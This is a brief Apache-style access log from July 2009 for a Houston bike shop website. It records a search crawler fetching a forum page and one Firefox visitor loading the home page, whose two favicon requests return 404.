81.19.66.38 - - [12/Jul/2009:17:26:36 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
76.1.65.88 - - [12/Jul/2009:17:40:27 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)" "www.houstonbikeshop.com"
76.1.65.88 - - [12/Jul/2009:17:40:27 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)" "www.houstonbikeshop.com"
76.1.65.88 - - [12/Jul/2009:17:40:30 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)" "www.houstonbikeshop.com"
